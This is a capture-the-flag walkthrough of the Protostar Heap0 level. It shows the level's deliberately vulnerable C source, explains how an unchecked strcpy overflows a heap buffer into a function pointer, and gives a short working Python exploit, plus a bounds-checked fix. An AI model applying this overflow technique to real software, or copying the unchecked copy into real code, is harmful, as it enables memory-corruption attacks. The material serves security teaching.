
Binary Exploitation Protostar Heap0 - Walkthrough - Writeups

Hello Guyz,

Welcome again to my blog. Today, I am going to share with you my walkthrough of the Exploit-Exercises Protostar Heap0 level.

In this level, our task is to execute the winner function by means of a heap overflow.

Before starting the walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game. I am just a player.
  • Here, I am just providing hints and references, so if you feel stuck anywhere, take a look here.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and GDB.
  • Do some research on heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

/* 64-byte buffer, allocated first on the heap */
struct data {
  char name[64];
};

/* single function pointer, allocated right after the data struct */
struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  /* unbounded copy of argv[1] into the 64-byte name buffer: this is the bug */
  strcpy(d->name, argv[1]);

  /* calls whatever address the function pointer holds by now */
  f->fp();
}

This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Code Review

  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));   <--- Allocates space for the data struct
  f = malloc(sizeof(struct fp));     <--- Allocates space for the fp struct, placed just after the data struct on the heap
  f->fp = nowinner;                  <--- Stores the address of nowinner in the fp struct's function pointer

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);          <--- No check on the input length: argv[1] is copied into the 64-byte name buffer as-is
  f->fp();                           <--- Calls whatever address the function pointer now holds

As you can see, nothing in the source code verifies the length of the user input. Hence, we can easily overflow the heap buffer and overwrite the function pointer with the address of the winner function.


  Heap Overview
 | Name[64]              | chunk header (8) | FP  |
  Overflow Name and write data into FP. The 8 bytes between them are the malloc chunk header of the fp allocation, which is why the padding before the address is 72 bytes, not 64.


import struct
# /opt/protostar/bin/heap0 $(python

buf = "a"*72                 # fills the 64-byte name buffer plus the 8-byte chunk header of the fp chunk
win = 0x08048464             # address of winner() in /opt/protostar/bin/heap0
ret = struct.pack("I",win)   # 32-bit little-endian pointer that lands exactly on f->fp

payload = ''
payload+= buf
payload+= ret
print payload                # Python 2 on the Protostar VM: output is passed to the binary as argv[1]
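To make the layout and the fix concrete, here is an added C example (not the Protostar source and not the exploit above): the same two heap chunks as heap0, with the unchecked strcpy replaced by a length-checked copy. The names fp_offset, set_name and run are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not Protostar's own code: heap0's two-chunk layout with
   the unchecked strcpy replaced by a length-checked copy.
   The function names (fp_offset, set_name, run) are my own. */

struct data { char name[64]; };
struct fp   { int (*fp)(void); };

int nowinner(void) { puts("level has not been passed"); return 0; }

/* Distance in bytes from d->name to the fp chunk. On the 32-bit Protostar VM
   this is the 72 used in the exploit (64 bytes of name plus the 8-byte chunk
   header of the next malloc chunk); other allocators give other values. */
long fp_offset(void) {
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    long off = (char *)f - (char *)d;
    free(f); free(d);
    return off;
}

/* Replacement for strcpy(d->name, argv[1]): rejects any input that does not
   fit in name together with its terminating NUL, so nothing is ever written
   past the struct into the neighbouring chunk. Returns 0 or -1. */
int set_name(struct data *d, const char *src) {
    size_t n = 0;
    while (n < sizeof d->name && src[n] != '\0')   /* bounded length scan */
        n++;
    if (n >= sizeof d->name)
        return -1;
    memcpy(d->name, src, n + 1);
    return 0;
}

/* heap0's main() with the hardened copy. Returns -1 if the input was rejected,
   otherwise the value returned through f->fp, which still points at nowinner. */
int run(const char *input) {
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    int result = -1;
    f->fp = nowinner;
    if (set_name(d, input) == 0)
        result = f->fp();
    free(f); free(d);
    return result;
}
```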

For a more detailed walkthrough, check the YouTube video playlist provided below.
